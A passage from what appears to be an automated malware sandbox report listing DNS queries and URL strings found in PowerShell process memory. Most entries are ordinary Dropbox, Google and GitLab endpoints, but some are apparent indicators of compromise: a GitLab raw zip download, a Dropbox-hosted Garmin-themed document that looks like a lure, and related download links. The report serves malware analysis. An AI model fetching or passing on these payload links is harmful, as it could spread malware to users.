https://docs.sandbox.google.com/spreadsheets/fsip/ https://docs.sandbox.google.com/presentation/fsip/ https://*.purple.officeapps.live-int.com https://officeapps-df.live.com https://*.officeapps-df.live.com https://officeapps.live.com https://*.officeapps.live.com https://paper.dropbox.com/cloud-docs/edit 'self' https://www.dropbox.com/ https://dl-web.dropbox.com/ https://photos.dropbox.com/ https://paper.dropbox.com/ https://showcase.dropbox.com/ https://www.hellofax.com/ https://app.hellofax.com/ https://www.hellosign.com/ https://app.hellosign.com/ https://docsend.com/ https://www.docsend.com/ https://help.dropbox.com/ https://navi.dropbox.jp/ https://a.sprig.com/ https://selfguidedlearning.dropboxbusiness.com/ https://instructorledlearning.dropboxbusiness.com/ https://sales.dropboxbusiness.com/ https://accounts.google.com/ https://api.login.yahoo.com/ https://login.yahoo.com/ https://experience.dropbox.com/ https://pal-test.adyen.com https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/ https://onedrive.live.com/picker equals www.yahoo.com (Yahoo)
                Source: global trafficDNS traffic detected: DNS query: www.dropbox.com
                Source: global trafficDNS traffic detected: DNS query: uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com
                Source: global trafficDNS traffic detected: DNS query: gitlab.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edge-block-www-env.dropbox-dns.com
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://gitlab.com
                Source: powershell.exe, 0000000C.00000002.2166323032.0000028C1E69F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2166323032.0000028C1E7E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CDB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E681000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0E631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70CC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC9C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www-env.dropbox-dns.com
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.dropbox.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://2e83413d8036243b-Dropbox-pal-live.adyenpayments.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://a.sprig.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://accounts.google.com/gsi/client
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0E631000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70CC01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.000002230005B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300023000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.login.yahoo.com/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellofax.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://app.hellosign.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://canny.io/sdk.js
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cfl.dropboxstatic.com/static/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://collector.prd-278964.gl-product-analytics.com
                Source: powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: powershell.exe, 00000011.00000002.3326115686.00000223016CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223016E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.00000223016BD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.000002230169A000.00000004.00000800.00020000.00000000.sdmp, targets.vc.17.drString found in binary or memory: https://core.tcl-lang.org/tips/doc/main/tip/477.md)
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://customers.gitlab.com
                Source: powershell.exe, 00000011.00000002.3326115686.00000223017C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Connection
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl-web.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/document/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/presentation/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/document/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/presentation/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docs.sandbox.google.com/spreadsheets/fsip/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://docsend.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://experience.dropbox.com/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E21F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70DD77000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/sandbox/;
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/-/speedscope/index.html
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/admin/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/assets/
                Source: powershell.exe, 0000000E.00000002.3248561774.000002C70AED4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70CE32000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gitlab.com/stare2/garmin/-/raw/main/fuknew1112.zip
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0F263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70DD77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000011.00000002.3326115686.0000022300538000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                Source: powershell.exe, 0000000E.00000002.3301955351.000002C724C4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://go.microsoft.co
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://help.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://instructorledlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.yahoo.com/
                Source: powershell.exe, 00000011.00000002.3326115686.0000022300F38000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.html
                Source: powershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.html)1
                Source: powershell.exe, 00000011.00000002.3326115686.00000223015CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mhammond.github.io/pywin32_installers.htmlz?Please
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://navi.dropbox.jp/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://new-sentry.gitlab.net/api/4/security/?sentry_key=f5573e26de8f4293b285e556c35dfd6e&sentry_env
                Source: powershell.exe, 0000000C.00000002.2166323032.0000028C1E69F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2166323032.0000028C1E7E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C10001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CDB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3296204668.000002C71CC6F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps-df.live.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://officeapps.live.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://onedrive.live.com/picker
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pal-test.adyen.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://paper.dropbox.com/cloud-docs/edit
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://photos.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sales.dropboxbusiness.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://selfguidedlearning.dropboxbusiness.com/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sentry.gitlab.net
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://showcase.dropbox.com/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://snowplow.trx.gitlab.net
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sourcegraph.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uc92b2f2a01e6ad039b6c0957485.dl.dropboxusercontent.com/cd/0/get/CgGuX16-G6p7Fe4NIKQ0zfuqQ5PK
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.docsend.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0F263000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC56000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/encrypted_folder_download/service_worker.js
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/page_success/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/pithos/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/playlist/
                Source: powershell.exe, 0000000C.00000002.2169790015.0000028C26960000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx70q
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FFF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/Garmin_Campaign_Information_for_Partners_V3.doc
                Source: powershell.exe, 0000000C.00000002.2169706025.0000028C267D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/scl/fi/4p5pc2fbhxx7mz0qnortk/garmin_campaign_information_for_partners_v3.doc
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/service_worker.js
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/api/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/static/serviceworker/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/v/s/playlist/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.dropboxstatic.com/static/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
                Source: powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com/ns.html
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E248000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.3250200851.000002C70E224000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellofax.com/
                Source: powershell.exe, 0000000C.00000002.2154119672.0000028C0FC7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC5C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.2154119672.0000028C0FC80000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.hellosign.com/
